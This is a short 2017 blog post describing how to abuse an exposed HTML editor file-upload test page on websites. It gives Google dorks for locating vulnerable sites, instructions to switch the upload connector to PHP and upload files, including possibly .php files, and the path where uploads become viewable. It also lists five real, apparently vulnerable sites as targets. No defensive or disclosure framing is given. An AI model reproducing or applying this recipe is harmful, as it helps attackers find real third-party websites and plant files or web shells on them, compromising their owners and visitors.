Friday, December 8, 2017

Html editor File Upload vulnerability

Html editor File Upload vulnerability



Google Dork : inurl:/HTMLEditor/editor/ 
or "inurl:/HTMLEditor/editor//filemanager/"
or "inurl:/HTMLEditor/editor//filemanager//connectors/"


Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html


Go here :

http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
 chnage connectors into PhP (Like FCKeditor) and upload Your file


suppoted files : .TXT and .JPG in some site you can upload .html and .php too


to view you file goto : http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here 

Examples :
http://braillewellclothing.com/bluelinemotorsports/HTMLEditor/editor/filemanager/connectors/uploadtest.html
http://www.tuxguitar.com.ar/pbcommon/htmleditor/editor/filemanager/connectors/uploadtest.html
http://braillewellclothing.com/bluelinemotorsports/HTMLEditor/editor/filemanager/connectors/uploadtest.html
http://morsewellclothing.com/bluelinemotorsports/HTMLEditor/editor/filemanager/connectors/uploadtest.html
http://onlinedismantler.com/bluelinemotorsports/HTMLEditor/editor/filemanager/connectors/uploadtest.html


visit link download
Posted by at
Labels: , , , ,